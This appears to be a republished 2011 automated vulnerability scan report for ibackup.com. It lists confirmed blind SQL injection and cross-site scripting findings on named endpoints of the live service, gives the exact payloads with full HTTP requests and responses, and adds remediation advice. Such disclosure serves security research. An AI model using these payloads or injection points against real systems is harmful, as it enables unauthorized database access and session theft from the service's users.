XSS, ibackup.com, GHDB DORK REPORT SUMMARY 
					
					Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search 
     XSS Home   |  XSS Crawler   | SQLi Crawler   | HTTPi Crawler   | FI Crawler   |
    
	Private Reporting  of Security Research is preferred for Online Service Providers  
 
 
Loading
 
 
					Netsparker - Scan Report Summary
				 
			 
			
				
					
						
							
								
									TARGET URL
							 
							
								
									http://www.ibackup.com/forgotpass_new.htm 
							 
						 
						
							
								
									SCAN DATE
							 
							
								6/23/2011 8:52:39 PM
							 
						 
						
							
								
									REPORT DATE
							 
							
								6/24/2011 5:20:10 AM
							 
						 
						
							
								
									SCAN DURATION
							 
							
								
								00:31:53
							 
						 
					
				 
				
					
						
Total Requests 
						
					
					
						
Average Speed 
						
						req/sec.
					
				 
				
					
						26
					
						identified
					
						9
					
						confirmed
					
						1
					
						critical
					
						15
					
						informational
				 
			 
			
				
					SCAN SETTINGS 
					Scan Settings
				 
			 
			
				
					
						
							
								
									PROFILE
							 
							
								Previous Settings
							 
						 
						
							
								
									ENABLED ENGINES
							 
							
								Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
							 
						 
					
				 
				
					
						Authentication
					
					
						Scheduled
					
				 
			 
		
		
		
		
			
				
					VULNERABILITIES 
					Vulnerabilities
				 
			 
			
				
					
				 
				
					
					
					
					
					
				 
			 
		
		
		
		
			
				
					VULNERABILITY SUMMARY 
					Vulnerability Summary
				 
			 
			
				
					
				 
			 
		
		
		
		Blind SQL Injection
		Blind SQL Injection  
		
		
			
SQL Injection occurs when data input for example by a user is interpreted as a SQL command rather than normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Netsparker 
confirmed  the vulnerability by executing a test SQL Query on the back-end database. In these tests, SQL Injection was not obvious but the different responses from the page based on the injection test allowed us to identify and confirm the SQL Injection.
			
Impact 
Depending on the backend database, the database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:
	Reading, Updating and Deleting arbitrary data from the database 
	Executing commands on the underlying operating system 
	Reading, Updating and Deleting arbitrary tables from the database 
  
Actions to Take 
	
		See the remedy for solution. 
		If you are not using a database access layer (DAL), consider using one. This will help you to centralise the issue. You can also use an ORM (object relational mapping ). Most of the ORM systems use only parameterised queries and this can solve the whole SQL Injection problem. 
		Locate the all dynamically generated SQL queries and convert them to parameterised queries. (If you decide to use a DAL/ORM change all legacy code to use these new libraries ) 
		Use your weblogs and application logs to see if there was any previous but undetected attack to this resource. 
	 
	
 
A robust method for mitigating the threat of SQL Injection based vulnerabilities is to use parameterized queries (prepared statements ). Almost all modern languages provide built in libraries for this. Wherever possible do not create dynamic SQL queries or SQL queries with string concatenation.
Required Skills for Successful Exploitation 
There are numerous freely available tools to exploit SQL Injection vulnerabilities. This is a complex area with many dependencies, however it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL Injection is one of the most common web application vulnerabilities.
External References 
Remedy References 
		 
		
			
				
					
						- /ibprof/jsp/ibpr_firewallinfo.jsp
						
					 
				 
			
			
			
			
			Parameters 
			
				
					
						Parameter
					 
					
						Type
					 
					
						Value
					 
				 
				
					
						submit
					 
					
						POST
					 
					
						Submit
					 
				 
				
					
						username
					 
					
						POST
					 
					
						-111' OR SLEEP(25)=0 LIMIT 1-- 
					 
				 
			
			Request 
			POST /ibprof/jsp/ibpr_firewallinfo.jsp HTTP/1.1 Referer: http://www.ibackup.com/professional/online-backup-firewallguidance.htm User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.ibackup.com Cookie: JSESSIONID=80F5EFFDC646076C473D6C3B00362ECD.tomcat10 Content-Length: 64 Accept-Encoding: gzip, deflate Connection: Keep-Alive submit=Submit&username=-111%27%20OR%20SLEEP(25)=0%20LIMIT%201--+
			Response 
			HTTP/1.0 200 OK Date: Fri, 24 Jun 2011 02:11:21 GMT Server: Apache Connection: close Content-Type: text/html;charset=ISO-8859-1 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <link href="/professional/images/prof_style.css" rel="stylesheet" type="text/css" /> <script language="javascript" src="/professional/images/prof_swap.js"></script> <script language="JavaScript" src="/professional/images/prof_pmenu.js"></script> <script language="JavaScript" src="/professional/images/prof_mm_menu.js"></script> <script type="text/javascript"> <!-- function MM_swapImgRestore() { //v3.0   var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc; } function MM_preloadImages() { //v3.0   var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();     var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++)     if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}} } function MM_findObj(n, d) { //v4.01   var p,i,x;  if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {     d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}   if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n];   for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document);   if(!x && d.getElementById) x=d.getElementById(n); return x; } function MM_swapImage() { //v3.0   var i,j=0,x,a=MM_swapImage.arguments; document.MM_sr=new Array; for(i=0;i<(a.length-2);i+=3)    if ((x=MM_findObj(a[i]))!=null){document.MM_sr[j++]=x; if(!x.oSrc) x.oSrc=x.src; x.src=a[i+2];} } //--> </script> <link rel="icon" href="/professional/images/favicon.ico" type="image/x-icon" /> <link rel="shortcut icon" href="/professional/images/favicon.ico" type="image/x-icon"  /> </head> <body onload="MM_preloadImages('/professional/images/prof_cmddwnd_ovr.gif','images/ibp_signup-ovr.jpg','images/ibp_features-ovr.jpg','images/ibp_dwnld-ovr.jpg','images/ibp_prdts-ovr.jpg','images/ibp_security-ovr.jpg','images/ibp_partners-ovr.jpg','images/ibp_comp-ovr.jpg','images/ibp_supp-ovr.jpg','images/ibp_fqs-ovr.jpg')"> <script language="JavaScript1.2">mmLoadMenus();</script> <table width="100%" border="0" cellpadding="0" cellspacing="0">   <tr>     <td background="/professional/images/prof_topbg.jpg"><table width="960" border="0" align="center" cellpadding="0" cellspacing="0">       <tr>         <td width="160"><a href="/professional/index.html"><img src="/professional/images/prof_logo.jpg" alt="IBackup Professional" width="160" height="115" border="0" /></a></td>         <td align="right"><table width="347" border="0" align="right" cellpadding="0" cellspacing="0">           <tr>             <td width="90" align="right"><a href="/professional/index.html"><img src="/professional/images/prof_homeicon_new.jpg" alt="Home" width="90" height="115" border="0" /></a></td>             <td width="140" align="right"><a href="/professional/online-backup-pricing.htm"><img src="/professional/images/prof_pricing_new.jpg" alt="Pricing Plans" width="140" height="115" border="0" /></a></td>             <td width="117" align="right"><a href="/professional/online-backup-demo.htm"><img src="/professional/images/prof_demoicon_new.gif" alt="View Demo" width="117" height="115" border="0" /></a></td>           </tr>         </table></td>       </tr>     </table></td>   </tr> </table> <img src="/professional/images/prof_spacer.gif" width="10" height="6" /><br /> <table width="960" border="0" align="center" cellpadding="0" cellspacing="0">   <tr>     <td width="106"><a href="https://www.ibackup.com/ibprof/jsp/ibpn_regterms.jsp" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('Image44','','/professional/images/ibp_signup-ovr.jpg',1)"><img src="/professional/images/ibp_signup.jpg" name="Image44" width="106" height="42" border="0" id="Image44" /></a></td>     <td width="106"><a href="/professional/online-backup-features.htm" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('Image45','','/professional/images/ibp_features-ovr.jpg',1)"><img src="/professional/images/ibp_features.jpg" name="Image45" width="106" height="42" border="0" id="Image45" /></a></td>     <td width="106"><a href="/professional/online-backup-download.htm" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('Image46','','/professional/images/ibp_dwnld-ovr.jpg',1)"><img src="/professional/images/ibp_dwnld.jpg" name="Image46" width="106" height="42" border="0" id="Image46" /></a></td>     <td width="106"><a href="#" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('Image47','','/professional/images/ibp_prdts-ovr.jpg',1)"><img src="/professional/images/ibp_prdts.jpg" name="Image47" width="106" height="42" border="0" id="Image47" onmouseover="MM_swapImage('Image47','','/professional/images/prof_prd_ovr.jpg',1);MM_showMenu(window.mm_menu_0215100459_0,0,42,null,'Image47')" onmouseout="MM_swapImgRestore();MM_startTimeout()" /></a></td>     <td width="106"><a href="/professional/online-backup-security.htm" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('Image48','','/professional/images/ibp_security-ovr.jpg',1)"><img src="/professional/images/ibp_security.jpg" name="Image48" width="106" height="42" border="0" id="Image48" /></a></td>     <td width="106"><a href="/professional/partner/index.html" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('Image49','','/professional/images/ibp_partners-ovr.jpg',1)"><img src="/professional/images/ibp_partners.jpg" name="Image49" width="106" height="42" border="0" id="Image49" /></a></td>     <td width="112"><a href="/professional/online-backup-compliance.htm" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('Image41','','/professional/images/ibp_comp-ovr.jpg',1)"><img src="/professional/images/ibp_comp.jpg" name="Image41" width="112" height="42" border="0" id="Image41" /></a></td>     <td width="106"><a href="/professional/online-backup-support.htm" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('Image42','','/professional/images/ibp_supp-ovr.jpg',1)"><img src="/professional/images/ibp_supp.jpg" name="Image42" width="106" height="42" border="0" id="Image42" /></a></td>     <td width="106" align="left"><a href="/professional/online-backup-faq.htm" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('Image43','','/professional/images/ibp_fqs-ovr.jpg',1)"><img src="/professional/images/ibp_fqs.jpg" name="Image43" width="106" height="42" border="0" id="Image43" /></a></td>   </tr> </table> <img src="/professional/images/prof_spacer.gif" width="10" height="6" /><br /> </body> </html> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>IBackup Professional - Online Backup with higher security and higher retention</title> <link rel="stylesheet" href="/professional/images/ibprof_style.css" type="text/css" /> <script src="/professional/images/AC_RunActiveContent.js" type="text/javascript"></script> <script language="JavaScript" src="/professional/images/mm_menu.js"></script> <script language="JavaScript" src="/professional/images/ibpn_pmenu.js"></script> <script language="JavaScript"> <!-- function validateForm(thisForm) { if (thisForm.username.value =='') 	{ 		thisForm.username.focus(); 		alert('Select the Username.'); 		return (false); 	} 	else 	{ 	return true; 	} } function MM_swapImgRestore() { //v3.0   var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc; } function MM_preloadImages() { //v3.0   var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();     var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++)     if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}} } function MM_findObj(n, d) { //v4.0   var p,i,x;  if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {     d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}   if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n];   for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document);   if(!x && document.getElementById) x=document.getElementById(n); return x; } function MM_swapImage() { //v3.0   var i,j=0,x,a=MM_swapImage.arguments; document.MM_sr=new Array; for(i=0;i<(a.length-2);i+=3)    if ((x=MM_findObj(a[i]))!=null){document.MM_sr[j++]=x; if(!x.oSrc) x.oSrc=x.src; x.src=a[i+2];} } //--> </script> <script language="JavaScript1.2" src="/professional/fw_menu.js"></script> </head> <body LEFTMARGIN="0" TOPMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0"> <table width="960" border="0" align="center" cellpadding="0" cellspacing="0" >   <tr>     <td valign="top"><img src="/professional/images/prof_newtopbg.gif" width="960" height="16" /></td>   </tr>   <tr>     <td width="100%" valign="top" background="/professional/images/prof_newmbg.gif"> 	<br /> 	<table width="96%" border="0" align="center" cellpadding="4" cellspacing="0" class="txt-content">       <tr>         <td class="txt-orange-small"><strong>Firewall Guidance</strong></td>       </tr>       <tr>         <td><hr size="1" color="#e3e3e3" noshade="noshade" /></td>       </tr>       <tr>         <td><p align="justify">IBackup Professional application is designed to be firewall friendly. In most cases, you simply will have to permit firewall prompts related to IBackup Professional on install. In case you need to configure firewall permissions manually, here are the details:</p>           <p align="justify"> Following IPs and Ports are used by IBackup Professional. You need to configure your firewall to allow these:</p>           <br />             <table width="96%" border="0" align="center" cellpadding="7" cellspacing="1" class="txt-content">               <tr>                 <td width="240" valign="top"><strong>Server IP address and port number</strong></td>                 <td width="10" valign="top">:</td>                 <td valign="top">64.14.192.230 and 11900 				 				</td>               </tr>               <tr>                 <td><strong>Executable</strong></td>                 <td>:</td>                 <td>IBackupProfClient.exe</td>               </tr>             </table>           <br /></td>       </tr>     </table> 	 	<br /> 	</td>   </tr>   <tr>     <td valign="top"><img src="/professional/images/prof_newbtnbg.gif" width="960" height="16" /></td>   </tr> </table> </body> </html> <!-- saved from url=(0022)http://internet.e-mail --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <link href="/professional/images/prof_style.css" rel="stylesheet" type="text/css" /> </head> <body> <img src="/professional/images/prof_spacer.gif" width="10" height="6" /><br /> <table width="100%" border="0" align="center" cellpadding="0" cellspacing="0">   <tr>     <td background="/professional/images/prof_ftrline_btm.jpg"><img src="/professional/images/prof_spacer.gif" width="20" height="2" /></td>   </tr>   <tr>     <td background="/professional/images/prof_ftrcolor.jpg"><table width="960" border="0" align="center" cellpadding="0" cellspacing="0" class="txt-content">       <tr>         <td width="5"><img src="/professional/images/prof_spacer.gif" width="5" height="70" /></td>         <td align="center"><span class="txtfooter">Copyright © Pro Softnet Corporation.<br />           All rights   reserved.</span></td>       </tr>     </table></td>   </tr>   <tr>     <td bgcolor="#666666"><img src="/professional/images/prof_spacer.gif" width="10" height="10" /></td>   </tr> </table> </body> </html>
		 
		
		
		Cross-site Scripting
		Cross-site Scripting  
		
		
			
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (
Javascript, VbScript ) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.
XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.
			
Impact 
There are many different attacks that can be leveraged through the use of XSS, including:
	Hi-jacking users' active session 
	Changing the look of the page within the victims browser. 
Mounting a successful phishing attack. 
	Intercept data and perform man-in-the-middle attacks. 
 
 
The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.
Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.
There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform  and Microsoft Anti Cross-site Scripting  libraries are good examples.
 
External References 
		 
		
			
				
					
						- /qmanager/jsp/forgotpwd.jsp
						
					 
				 
			
			
			
			
			Parameters 
			
				
					
						Parameter
					 
					
						Type
					 
					
						Value
					 
				 
				
					
						emailid
					 
					
						POST
					 
					
						'"--></style></script><script>alert(0x0002FE)</script>
					 
				 
				
					
						Submit
					 
					
						POST
					 
					
						Get Password
					 
				 
				
					
						username
					 
					
						POST
					 
					
						Smith
					 
				 
			
			Request 
			POST /qmanager/jsp/forgotpwd.jsp HTTP/1.1 Referer: http://www.ibackup.com/forgotpass_new.htm User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.ibackup.com Cookie: JSESSIONID=CA113453A6F667BAEAFBFBC6E766EE92.tomcat9 Content-Length: 128 Accept-Encoding: gzip, deflate Connection: Keep-Alive emailid='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0002FE)%3c%2fscript%3e&Submit=Get+Password&username=Smith
			Response 
			HTTP/1.0 200 OK Date: Fri, 24 Jun 2011 02:03:01 GMT Server: Apache Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Length: 744 Connection: close Content-Type: text/html;charset=ISO-8859-1 <HTML> <HEAD> <title>Online Backup - Online Storage, Online Backup, Internet Hard Drive , Online File Storage and Collaboration</title> </HEAD> <BODY> <script type='text/javascript' language='JavaScript'>function submitForm() {document.form1.action= 'https://www2.ibackup.com/qmanager/servlet/ForgotPass';document.form1.username.value = 'smith';document.form1.emailid.value = ''"--></style></script><script>netsparker(0x0002fe)</script>';document.form1.method='POST';document.form1.submit();} </script> <form name='form1'> <input type=hidden name='username' value=''> <input type=hidden name='emailid' value=''> <script type='text/javascript' language='JavaScript'> submitForm(); </script> </form> </BODY> </HTML>
		 
		
		
		Password Transmitted Over HTTP
		Password Transmitted Over HTTP  
		
		
			
Netsparker identified that password data is sent over HTTP. 
			
Impact 
If an attacker can intercept network traffic he/she can steal users credentials.
Actions to Take 
	
		See the remedy for solution. 
		Move all of your critical forms and pages to HTTPS and do not serve them over HTTP. 
	 
	
 
All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input starting from the login process should only be served over HTTPS.
		 
		
			
			
			
			
			
			
				mshtml.HTMLInputElementClass
			Request 
			GET /index.html.old HTTP/1.1 Referer: http://www.ibackup.com/index.html.old User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.ibackup.com Accept-Encoding: gzip, deflate
			Response 
			HTTP/1.1 200 OK Date: Fri, 24 Jun 2011 01:55:58 GMT Server: Apache Last-Modified: Fri, 12 Nov 2004 09:02:15 GMT ETag: "10c254-588e-41947c17" Accept-Ranges: bytes Content-Length: 22670 Content-Type: text/html <html><head><title>IBackup - Online Backup and Online Storage Services. Offsite Backup and Remote Data Backup Solution.</TITLE><META NAME="KEYWORDS" CONTENT="online backup data,online data backup,online server backup,online backup service,online server backups,online data backups,backup service,online file backups,online backups,remote data backups,online backup,online file backup,online backup services"><META NAME="DESCRIPTION" CONTENT="Online Backup: Specializing in online backup services and online storage services"><META NAME="ROBOTS" CONTENT="INDEX,FOLLOW"><LINK REL=stylesheet TYPE="text/css" HREF="/images/style.css"><style>.textsmlbk {  font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; color: #000000}</style><script language="JavaScript"><!--function namosw_goto_byselect(sel, targetstr){  var index = sel.selectedIndex;  if (sel.options[index].value != '') {     if (targetstr == 'blank') {       window.open(sel.options[index].value, 'win1');     } else {       var frameobj;       if ((frameobj = eval(targetstr)) != null)       frameobj.location = sel.options[index].value;     }  }}function MM_swapImgRestore() { //v3.0  var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc;}function MM_preloadImages() { //v3.0  var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();    var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++)    if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}}}function MM_findObj(n, d) { //v4.0  var p,i,x;  if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {    d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}  if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n];  for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document);  if(!x && document.getElementById) x=document.getElementById(n); return x;}function MM_swapImage() { //v3.0  var i,j=0,x,a=MM_swapImage.arguments; document.MM_sr=new Array; for(i=0;i<(a.length-2);i+=3)   if ((x=MM_findObj(a[i]))!=null){document.MM_sr[j++]=x; if(!x.oSrc) x.oSrc=x.src; x.src=a[i+2];}}//--></SCRIPT></head><script language='JavaScript'>function confirmSubmit(thisForm){   if(isBlank(thisForm.USERNAME.value))   {  alert("Username is required");      thisForm.USERNAME.focus();	  return false;   }   if(isBlank(thisForm.PASSWORD.value))   {  alert("Password cannot be blank");      thisForm.PASSWORD.focus();	  return false;   }     if(invaliddata(thisForm.USERNAME.value))   {  alert("Special characters are not allowed in username");      thisForm.USERNAME.focus();	  return false;   }    if(invaliddata(thisForm.PASSWORD.value))   {  alert("Special characters are not allowed in password");      thisForm.PASSWORD.focus();	  return false;   }   else   {  return true ;   }}function invaliddata(Str)  {     if( (Str.indexOf("\'") != -1) || (Str.indexOf('\"') != -1) ||    (Str.indexOf('#') != -1) || (Str.indexOf('&') != -1)  ||    (Str.indexOf('%') != -1) || (Str.indexOf('*') != -1)  ||    (Str.indexOf('!') != -1) || (Str.indexOf('$') != -1)  ||    (Str.indexOf('/') != -1) || (Str.indexOf('\\') != -1)  ||    (Str.indexOf('-') != -1) ||    (Str.indexOf('@') != -1)|| (Str.indexOf('?') != -1) )     { return(true);     }     else     { return (false);     }  }function isBlank(Str) {   while(''+Str.charAt(0)==' ')   Str=Str.substring(1,Str.length);   while(''+Str.charAt(Str.length-1)==' ')   Str=Str.substring(0,Str.length-1);   if (Str == '')   { return(true);   }   else   { return(false);   }; }</script><body bgcolor="#FFFFFF" text="#000000" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" onLoad="MM_preloadImages('/images/but_co3u.gif','/images/but_su3u.gif','/images/but_se3u.gif','/images/but_te3u.gif','/images/but_st3u.gif','/images/but_fq3u.gif')"><table width="100%" border="0" cellspacing="0" cellpadding="0" bgcolor="#000000" class="textsmlbk">  <tr>    <td> </td>  </tr></table><table width="100%" border="0" cellspacing="0" cellpadding="0" background="/images/grad_3ext.gif">  <tr>    <td width="776">      <table width="776" border="0" cellspacing="0" cellpadding="0" class="textsmlbk">          <tr>          <td width="103"><a href="/index.html"><img src="/images/logo_3.gif" width="103" height="43" alt="IBackup, Online backup & Online storage" border="0"></a></td>            <td width="47"><img src="/images/grad_3.gif" width="47" height="43"></td>            <td width="48"><img src="/images/cur_3.gif" width="48" height="43"></td>            <td width="414"><img src="/images/banr_3.jpg" width="414" height="43"></td>             <form>            <td background="/images/grad_3u.jpg" valign="middle" align="center" width="164">              <select size="1" onChange="namosw_goto_byselect(this, 'self')" name="select">                  <option selected>Quick Guide</option>                  <option value="/charginghelp_new.htm">Storage                  Plans</option>                  <option value="/ibwin_new.htm">Scheduling</option>                  <option value="/IBDrive_new.htm">Network Drive</option>                  <option value="/tour_collaborate_new.htm">Sharing</option>                  <option value="/subaccountsfaq_new.htm">Sub-Accounts</option>                  <option value="/ftpready_new.htm">FTP</option>                  <option value="/webfolders_new.htm">WebFolders</option>                  <option value="/tour_ibweb_new.htm">Smart IB</option>                  <option value="/ibdrivemac_new.htm">IDrive for Mac                      </option>                  <option value="/iblite_new.htm">Pocket PC</option>                  <option value="/email_new.htm">Email Drop</option>                  <option value="/iblinux_new.htm">Unix/Linux</option>                  <option value="/ibwin/ibackup_lta.htm">IBackup LTA</option>                  <option value="/businesstrial_new.htm">Trial Account</option>                  <option value="/press_new.htm">News/Reviews</option>                </select>            </td> </form>          </tr>      </table>    </td>    <td background="/images/grad_3ext.gif">  </td>  </tr></table><table width="100%" border="0" cellspacing="0" cellpadding="0" bgcolor="286396">  <tr>    <td width="776">      <table width="776" border="0" cellspacing="0" cellpadding="0">        <tr>          <td width="103" valign="top"><img src="/images/logo_3u.gif" width="103" height="20"></td>          <td width="47" valign="top"><img src="/images/grad_3ua.gif" width="47" height="20"></td>          <td width="48"><img src="/images/cur_3u.gif" width="48" height="20"></td>          <td valign="top" align="right"><img name="Image11" border="0" src="/images/but_ho3u.gif" width="82" height="20" alt="Home"><a href="/profile_new.htm" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image12','','/images/but_co3u.gif',1)"><img name="Image12" border="0" src="/images/but_co3.gif" width="82" height="20" alt="Company"></a><a href="/regterms_new.htm" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image13','','/images/but_su3u.gif',1)"><img name="Image13" border="0" src="/images/but_su3.gif" width="82" height="20" alt="Sign up"></a><a href="/security_new.htm" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image14','','/images/but_se3u.gif',1)"><img name="Image14" border="0" src="/images/but_se3.gif" width="82" height="20" alt="Security"></a><a href="/terms_new.htm" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image15','','/images/but_te3u.gif',1)"><img name="Image15" border="0" src="/images/but_te3.gif" width="82" height="20" alt="Terms"></a><a href="/feedback_new.htm" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image16','','/images/but_st3u.gif',1)"><img name="Image16" border="0" src="/images/but_st3.gif" width="82" height="20" alt="Support"></a><a href="/faq.htm" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image17','','/images/but_fq3u.gif',1)"><img name="Image17" border="0" src="/images/but_fq3.gif" width="82" height="20" alt="FAQ"></a></td>        </tr>      </table>    </td>    <td> </td>  </tr></table><table width="776" border="0" cellspacing="0" cellpadding="0">  <tr>    <td width="156" valign="top" bgcolor="#E5E5E5">      <table width="156" border="0" cellspacing="1" cellpadding="0">        <form action="https://www.ibackup.com/qmanager/servlet/LoginCheckServlet" method="POST" name="form1">          <tr>            <td height="43"> </td>            <td><b class="textsmlbk">Sign in</b><br>              <span class="textsmlbk">Username:</span><span class="textsmlbk"><font size="2"></font></span>              <br>              <input type="text" name="USERNAME" size="12" maxlength="20" class="fields">              <span class="textsmlbk"><br>              Password:</span> <br>              <input type="password" name="PASSWORD" size="12" maxlength="20" class="fields">              <br>              <input type=submit name=action value=LoginonClick=' return confirmSubmit(document.form1)' class="formfields">              <a href="/regterms_new.htm"><img src="/images/but_sgn3.gif" width="46" height="17" align="absbottom" border="0" alt="Signup for New Online Backup / Storage account"></a><br>              <a href="/forgotpass_new.htm" class="abodysml">Forgot your Password?</a>            </td>          </tr>        </form>      </table>      <table width="156" border="0" cellspacing="1" cellpadding="0">        <tr>           <td> </td>        </tr>        <tr>           <td><a href="/tour_start_new.htm"><img src="/images/nav_to3.gif" width="154" height="21" alt="Online Backup applications tour" border="0"></a></td>        </tr>        <tr>           <td><a href="/features.htm"><img src="/images/nav_dl3.gif" width="154" height="21" alt="Online Backup and Storage application Downloads" border="0"></a></td>        </tr>        <tr>           <td class="textsmlbk"><a href="/whats_new.htm"><img src="/images/nav_wn3.gif" width="154" height="21" alt="Whats is new - Online Backup " border="0"></a></td>        </tr>        <tr>           <td class="textsmlbk"> </td>        </tr>        <tr>           <td class="textsmlbk" align="center"><a href="/charginghelp_new.htm"><img src="/images/promo_2.gif" width="140" height="65" border="0" alt="Backup Only Plans-Click to know more" vspace="5"></a></td>        </tr>        <tr>          <td class="textsmlbk" align="center"><object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" width="136" height="99">              <param name=movie value="/images/idp2.swf">              <param name=quality value=high>              <embed src="/images/idp2.swf" quality=high pluginspage="macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="136" height="99">              </embed>             </object></td>        </tr>      </table>      <p> </p>    </td>    <td valign="top" class="textsmlbk">      <table width="610" border="0" cellspacing="0" cellpadding="0" align="right">        <tr>          <td class="textsmlbk"> </td>        </tr>        <tr>          <td>            <table width="608" border="0" cellspacing="0" cellpadding="1" align="right">              <tr>                <td width="281" valign="top" bgcolor="#CCCCCC">                  <table width="281" border="0" cellspacing="0" cellpadding="0" bgcolor="#FFFFFF">                    <tr>                      <td align="center"><object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="ibackup3/download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" width="281" height="168">                          <param name=movie value="/images/flash_3.swf">                          <param name=quality value=high>                          <embed src="/images/flash_3.swf" quality=high pluginspage="macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="281" height="168">                          </embed>                        </object></td>                    </tr>                  </table>                </td>                <td width="10" class="textsmlbk" bgcolor="#FFFFFF"> </td>                <td valign="top" class="textsmlbk" bgcolor="#CCCCCC" height="168">                  <table width="100%" border="0" cellspacing="0" cellpadding="5" bgcolor="#FFFFFF" height="168">                    